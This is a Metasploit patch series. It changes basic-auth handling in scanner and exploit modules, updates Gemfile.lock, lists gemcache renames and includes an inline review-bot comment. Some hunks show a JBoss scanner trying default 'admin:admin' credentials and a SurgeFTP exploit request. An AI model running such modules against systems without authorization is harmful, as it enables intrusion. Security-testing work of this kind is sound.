@@ -70,8 +69,7 @@ class Metasploit3 < Msf::Auxiliary # We favor automatic OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']), OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']), - OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']), - OptString.new('BASICAUTH', [false, 'Credential to use for basic auth (Ex: admin:admin)', '']) + OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']) ], self.class) deregister_options('RHOST') @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = datastore['DATA'] if not datastore['DATA'].empty? - req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty? + req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) return req end diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index d6dc7c3638..41f5566772 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => app, 'method' => 'GET', 'ctype' => 'text/plain', - 'basic_auth' => 'admin:admin' + 'authorization' => basic_auth('admin','admin') }, 20) if (res and res.code == 200) print_good("#{rhost}:#{rport} Authenticated using admin:admin") diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index b546de063f..cbddcb1930 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb 
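Review bot: `req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])` now runs for every request, whereas the removed line only set `'basic_auth'` when `BASICAUTH` was non-empty. With no credentials configured, the helper as rewritten in this commit still returns `Basic Og==` (the Base64 of `:`), so every request would carry an Authorization header the operator never asked for, and a server that validates it may answer differently. Keeping the guard restores the old behaviour: `req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) unless datastore['USERNAME'].to_s.empty?`. The hunk that removes `BASICAUTH` does not show `USERNAME` and `PASSWORD` being registered for this module, so that should be confirmed. The enclosing method starts outside this hunk.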
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'uri' => '/cgi/surgeftpmgr.cgi', 'method' => 'POST', - 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'vars_post' => { 'global_smtp' => "", diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index bb2f642e38..3ddd07d6bd 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -85,26 +85,6 @@ describe Rex::Proto::Http::Client do match.captures[0].chomp.should == base64 end end - - context "and basic_auth" do - before do - cli.set_config({"basic_auth" => "user:pass"}) - end - it "should not have two Authorization headers" do - req = cli.request_cgi - match = req.to_s.match("Authorization: Basic") - match.should be - match.length.should == 1 - end - it "should prefer basic_auth" do - req = cli.request_cgi - match = req.to_s.match(/Authorization: Basic (.*)$/) - match.should be - match.captures.length.should == 1 - match.captures[0].chomp.should == base64 - end - end - end it "should attempt to connect to a server" do From bd8f94c43dac3eb9a81edcce85e47bbe183093f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 13:44:52 -0600 Subject: [PATCH 55/87] Update to master tag of 0.5.1 of metasploit_data_models [#44034071] --- Gemfile.lock | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6ac57f60f6..983117cbb4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,6 +1,6 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 tag: 0.5.1 specs: metasploit_data_models (0.5.1) 
@@ -12,22 +12,22 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.11) - activesupport (= 3.2.11) + activemodel (3.2.12) + activesupport (= 3.2.12) builder (~> 3.0.0) - activerecord (3.2.11) - activemodel (= 3.2.11) - activesupport (= 3.2.11) + activerecord (3.2.12) + activemodel (= 3.2.12) + activesupport (= 3.2.12) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.11) + activesupport (3.2.12) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) coderay (1.0.9) diff-lcs (1.1.3) - i18n (0.6.1) + i18n (0.6.4) json (1.7.7) method_source (0.8.1) msgpack (0.5.2) From b855bd3f3affb2074b44326d94ab6c4e5edc6374 Mon Sep 17 00:00:00 2001 
From: Luke Imhoff Date: Fri, 1 Mar 2013 14:06:58 -0600 Subject: [PATCH 56/87] Add metasploit_data_models 0.5.1 to gemcache [#44034071] --- .../gems/metasploit_data_models-0.4.0/Gemfile | 10 - .../metasploit_data_models-0.4.0/Rakefile | 7 - .../app/models/mdm/web_vuln.rb | 16 - .../lib/metasploit_data_models/version.rb | 7 - .../.gitignore | 10 +- .../.rspec | 0 .../metasploit_data_models-0.5.1/.simplecov | 38 ++ .../metasploit_data_models-0.5.1/.yardopts | 4 + .../gems/metasploit_data_models-0.5.1/Gemfile | 22 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.5.1/Rakefile | 20 + .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 0 .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 
.../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 144 ++++ .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 79 +++ .../db/migrate/001_add_wmap_tables.rb | 35 + .../db/migrate/002_add_workspaces.rb | 36 + .../db/migrate/003_move_notes.rb | 20 + .../db/migrate/004_add_events_table.rb | 16 + .../db/migrate/005_expand_info.rb | 58 ++ .../db/migrate/006_add_timestamps.rb | 26 + .../db/migrate/007_add_loots.rb | 20 + .../db/migrate/008_create_users.rb | 16 + .../db/migrate/009_add_loots_ctype.rb | 10 + .../db/migrate/010_add_alert_fields.rb | 16 + .../db/migrate/011_add_reports.rb | 19 + .../db/migrate/012_add_tasks.rb | 24 + .../db/migrate/013_add_tasks_result.rb | 10 + .../db/migrate/014_add_loots_fields.rb | 12 + .../db/migrate/015_rename_user.rb | 16 + .../db/migrate/016_add_host_purpose.rb | 10 + .../db/migrate/017_expand_info2.rb | 58 ++ .../db/migrate/018_add_workspace_user_info.rb | 29 + .../db/migrate/019_add_workspace_desc.rb | 23 + .../db/migrate/020_add_user_preferences.rb | 11 + .../migrate/021_standardize_info_and_data.rb | 18 + .../db/migrate/022_enlarge_event_info.rb | 10 + .../migrate/023_add_report_downloaded_at.rb | 10 + .../024_convert_service_info_to_text.rb | 12 + .../db/migrate/025_add_user_admin.rb | 19 + .../db/migrate/026_add_creds_table.rb | 19 + .../20100819123300_migrate_cred_data.rb | 154 +++++ .../20100824151500_add_exploited_table.rb | 16 + .../20100908001428_add_owner_to_workspaces.rb | 9 + .../20100911122000_add_report_templates.rb | 18 + .../20100916151530_require_admin_flag.rb | 15 + ...00916175000_add_campaigns_and_templates.rb | 61 ++ .../20100920012100_add_generate_exe_column.rb | 8 + .../20100926214000_add_template_prefs.rb | 11 + .../migrate/20101001000000_add_web_tables.rb | 57 ++ 
.../db/migrate/20101002000000_add_query.rb | 10 + .../migrate/20101007000000_add_vuln_info.rb | 15 + ...20101008111800_add_clients_to_campaigns.rb | 10 + ...20101009023300_add_campaign_attachments.rb | 15 + .../20101104135100_add_imported_creds.rb | 17 + .../migrate/20101203000000_fix_web_tables.rb | 34 + .../20101203000001_expand_host_comment.rb | 12 + ...2033_add_limit_to_network_to_workspaces.rb | 9 + ...20110112154300_add_module_uuid_to_tasks.rb | 9 + .../migrate/20110204112800_add_host_tags.rb | 28 + .../20110317144932_add_session_table.rb | 110 +++ ...414180600_add_local_id_to_session_table.rb | 11 + .../20110415175705_add_routes_table.rb | 18 + .../migrate/20110422000000_convert_binary.rb | 72 ++ ...0110425095900_add_last_seen_to_sessions.rb | 8 + ...0110513143900_track_successful_exploits.rb | 31 + ...517160800_rename_and_prune_nessus_vulns.rb | 26 + ...0527000000_add_task_id_to_reports_table.rb | 11 + .../20110527000001_add_api_keys_table.rb | 12 + .../20110606000001_add_macros_table.rb | 16 + ...10622000000_add_settings_to_tasks_table.rb | 12 + .../20110624000001_add_listeners_table.rb | 19 + ...0625000001_add_macro_to_listeners_table.rb | 12 + ...110630000001_add_nexpose_consoles_table.rb | 21 + ...0002_add_name_to_nexpose_consoles_table.rb | 12 + .../20110717000001_add_profiles_table.rb | 15 + ...20110727163801_expand_cred_ptype_column.rb | 9 + .../20110730000001_add_initial_indexes.rb | 85 +++ .../migrate/20110812000001_prune_indexes.rb | 23 + .../db/migrate/20110922000000_expand_notes.rb | 9 + .../20110928101300_add_mod_ref_table.rb | 17 + ...10000_add_display_name_to_reports_table.rb | 24 + .../db/migrate/20111203000000_inet_columns.rb | 13 + .../20111204000000_more_inet_columns.rb | 17 + .../20111210000000_add_scope_to_hosts.rb | 9 + ...0120126110000_add_virtual_host_to_hosts.rb | 9 + ...20120411173220_rename_workspace_members.rb | 9 + ...20601152442_add_counter_caches_to_hosts.rb | 21 + .../20120625000000_add_vuln_details.rb | 34 + 
.../20120625000001_add_host_details.rb | 16 + .../migrate/20120625000002_expand_details.rb | 16 + .../migrate/20120625000003_expand_details2.rb | 24 + .../20120625000004_add_vuln_attempts.rb | 19 + ...000005_add_vuln_and_host_counter_caches.rb | 14 + .../20120625000006_add_module_details.rb | 118 ++++ .../20120625000007_add_exploit_attempts.rb | 26 + .../20120625000008_add_fail_message.rb | 12 + ...2805_add_owner_and_payload_to_web_vulns.rb | 13 + ...ired_columns_to_null_false_in_web_vulns.rb | 35 + .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 0 .../lib/metasploit_data_models/engine.rb | 0 .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 8 + .../lib/tasks/yard.rake | 27 + .../metasploit_data_models.gemspec | 4 + .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 87 +++ .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 
.../spec/dummy/db/schema.rb | 638 ++++++++++++++++++ .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 2 + ...c => metasploit_data_models-0.5.1.gemspec} | 16 +- 192 files changed, 3131 insertions(+), 47 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.gitignore (78%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.rspec (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/client.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_author.rb 
(100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_site.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/console_db.yml (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb create mode 100755 